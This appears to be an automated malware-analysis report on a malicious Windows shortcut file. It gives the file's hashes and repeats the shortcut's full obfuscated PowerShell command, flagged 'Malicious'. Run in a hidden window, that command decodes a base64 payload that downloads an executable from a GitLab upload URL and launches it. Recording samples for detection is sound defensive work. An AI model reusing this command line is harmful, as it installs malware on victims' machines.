|
Hash | Hash Value |
|---|---|
| MD5 | 020af94fb45abb8f50b8a9167ab408c3
|
| Sha1 | 716372e9b04acb364f615df4c796b7e8886cf414
|
| Sha256 | 1a2c595d6107450c9bcb1f204b2791dc610565399511f9fb34975222fb53570a
|
| Sha384 | c38349ea8747d58bac61ee11e91dfd94535472fa91769a561993ccc63db2bcbd884cfef0876dc5c09b06273791c6a9ec
|
| Sha512 | befecae14a6dec9d996a53d154a6819a38ade8ee7b9b248453233d783f56e8643530118caebbcd7085ce1588eee5ce981570340c754ad7283fb7833ee4ed035e
|
| SSDeep | 48:8gK461qZHiVXzQ1+xIG7avIKQjqW0OHALKl21tmw2fMIpfvU3Nx:8gl61qBgEtGVWW0OHALKl2+w2k
|
| TLSH | 4581CC1117EA021DE9B3AA366DFAB5519673FC26B9318A9E11CD020D0B33500EE21F3F
|
|
Name0 | Value |
|---|---|
| LNK: Command Execution | powershell.exe -WindowStyle hidden -NoExit -Command "$UMLKW7 = 'cVDnCbIvOjYgyYmRQTTA4Y0lJVjY0TFNldC1Db250ZW50ICRlbnY6VEVNUFxPSCAnUmV2aWV3JztbTWF0aF06OlBvdygxMCwgMjMpO1tNYXRoXTo6UG93KDEwLCAyMyk7U3RhcnQtUHJvY2VzcyAkZW52OlRFTVBcT0g7aXdyIC1VcmkgaHR0cHM6Ly9naXRsYWIuY29tLy0vcHJvamVjdC83NTk2MzE1My91cGxvYWRzL2NjZjA0NTg3MTRkNzBlYTk0NWM1MzQyZmRkZmE4MWM1L2Vzdi5leGUgLU91dEZpbGUgJGVudjpURU1QXDJMTzFNZXN2LmV4ZTtTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFwyTE8xTWVzdi5leGU7RXhpdA==';$E0LO9IB = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($UMLKW7.Substring(13)));[Math]::Pow(14, 14);[Math]::Pow(14, 14);[Math]::Pow(14, 14);[Math]::Pow(14, 14);Invoke-Expression -Command $E0LO9IB.Substring(13);Exit" |
| Deobfuscated PowerShell | -windowstyle "hidden" -NoExit -Command "$UMLKW7 = 'cVDnCbIvOjYgyYmRQTTA4Y0lJVjY0TFNldC1Db250ZW50ICRlbnY6VEVNUFxPSCAnUmV2aWV3JztbTWF0aF06OlBvdygxMCwgMjMpO1tNYXRoXTo6UG93KDEwLCAyMyk7U3RhcnQtUHJvY2VzcyAkZW52OlRFTVBcT0g7aXdyIC1VcmkgaHR0cHM6Ly9naXRsYWIuY29tLy0vcHJvamVjdC83NTk2MzE1My91cGxvYWRzL2NjZjA0NTg3MTRkNzBlYTk0NWM1MzQyZmRkZmE4MWM1L2Vzdi5leGUgLU91dEZpbGUgJGVudjpURU1QXDJMTzFNZXN2LmV4ZTtTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFwyTE8xTWVzdi5leGU7RXhpdA==';$E0LO9IB = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($UMLKW7.Substring(13)));[Math]::Pow(14, 14);[Math]::Pow(14, 14);[Math]::Pow(14, 14);[Math]::Pow(14, 14);Invoke-Expression -Command $E0LO9IB.Substring(13);Exit" |
| Deobfuscated PowerShell | -windowstyle "hidden" -NoExit -Command "$UMLKW7 = 'cVDnCbIvOjYgyYmRQTTA4Y0lJVjY0TFNldC1Db250ZW50ICRlbnY6VEVNUFxPSCAnUmV2aWV3JztbTWF0aF06OlBvdygxMCwgMjMpO1tNYXRoXTo6UG93KDEwLCAyMyk7U3RhcnQtUHJvY2VzcyAkZW52OlRFTVBcT0g7aXdyIC1VcmkgaHR0cHM6Ly9naXRsYWIuY29tLy0vcHJvamVjdC83NTk2MzE1My91cGxvYWRzL2NjZjA0NTg3MTRkNzBlYTk0NWM1MzQyZmRkZmE4MWM1L2Vzdi5leGUgLU91dEZpbGUgJGVudjpURU1QXDJMTzFNZXN2LmV4ZTtTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFwyTE8xTWVzdi5leGU7RXhpdA==';$E0LO9IB = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($UMLKW7.Substring(13)));[Math]::Pow(14, 14);[Math]::Pow(14, 14);[Math]::Pow(14, 14);[Math]::Pow(14, 14);Invoke-Expression -Command $E0LO9IB.Substring(13);Exit" |
|
Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | powershell.exe -WindowStyle hidden -NoExit -Command "$UMLKW7 = 'cVDnCbIvOjYgyYmRQTTA4Y0lJVjY0TFNldC1Db250ZW50ICRlbnY6VEVNUFxPSCAnUmV2aWV3JztbTWF0aF06OlBvdygxMCwgMjMpO1tNYXRoXTo6UG93KDEwLCAyMyk7U3RhcnQtUHJvY2VzcyAkZW52OlRFTVBcT0g7aXdyIC1VcmkgaHR0cHM6Ly9naXRsYWIuY29tLy0vcHJvamVjdC83NTk2MzE1My91cGxvYWRzL2NjZjA0NTg3MTRkNzBlYTk0NWM1MzQyZmRkZmE4MWM1L2Vzdi5leGUgLU91dEZpbGUgJGVudjpURU1QXDJMTzFNZXN2LmV4ZTtTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFwyTE8xTWVzdi5leGU7RXhpdA==';$E0LO9IB = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($UMLKW7.Substring(13)));[Math]::Pow(14, 14);[Math]::Pow(14, 14);[Math]::Pow(14, 14);[Math]::Pow(14, 14);Invoke-Expression -Command $E0LO9IB.Substring(13);Exit" Malicious |
020af94fb45abb8f50b8a9167ab408c3 |
| Deobfuscated PowerShell | -windowstyle "hidden" -NoExit -Command "$UMLKW7 = 'cVDnCbIvOjYgyYmRQTTA4Y0lJVjY0TFNldC1Db250ZW50ICRlbnY6VEVNUFxPSCAnUmV2aWV3JztbTWF0aF06OlBvdygxMCwgMjMpO1tNYXRoXTo6UG93KDEwLCAyMyk7U3RhcnQtUHJvY2VzcyAkZW52OlRFTVBcT0g7aXdyIC1VcmkgaHR0cHM6Ly9naXRsYWIuY29tLy0vcHJvamVjdC83NTk2MzE1My91cGxvYWRzL2NjZjA0NTg3MTRkNzBlYTk0NWM1MzQyZmRkZmE4MWM1L2Vzdi5leGUgLU91dEZpbGUgJGVudjpURU1QXDJMTzFNZXN2LmV4ZTtTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFwyTE8xTWVzdi5leGU7RXhpdA==';$E0LO9IB = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($UMLKW7.Substring(13)));[Math]::Pow(14, 14);[Math]::Pow(14, 14);[Math]::Pow(14, 14);[Math]::Pow(14, 14);Invoke-Expression -Command $E0LO9IB.Substring(13);Exit" Malicious |
020af94fb45abb8f50b8a9167ab408c3 > LNK CommandLine |
| Deobfuscated PowerShell | -windowstyle "hidden" -NoExit -Command "$UMLKW7 = 'cVDnCbIvOjYgyYmRQTTA4Y0lJVjY0TFNldC1Db250ZW50ICRlbnY6VEVNUFxPSCAnUmV2aWV3JztbTWF0aF06OlBvdygxMCwgMjMpO1tNYXRoXTo6UG93KDEwLCAyMyk7U3RhcnQtUHJvY2VzcyAkZW52OlRFTVBcT0g7aXdyIC1VcmkgaHR0cHM6Ly9naXRsYWIuY29tLy0vcHJvamVjdC83NTk2MzE1My91cGxvYWRzL2NjZjA0NTg3MTRkNzBlYTk0NWM1MzQyZmRkZmE4MWM1L2Vzdi5leGUgLU91dEZpbGUgJGVudjpURU1QXDJMTzFNZXN2LmV4ZTtTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFwyTE8xTWVzdi5leGU7RXhpdA==';$E0LO9IB = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($UMLKW7.Substring(13)));[Math]::Pow(14, 14);[Math]::Pow(14, 14);[Math]::Pow(14, 14);[Math]::Pow(14, 14);Invoke-Expression -Command $E0LO9IB.Substring(13);Exit" Malicious |
020af94fb45abb8f50b8a9167ab408c3 > LNK CommandLine > [Deobfuscated PS] |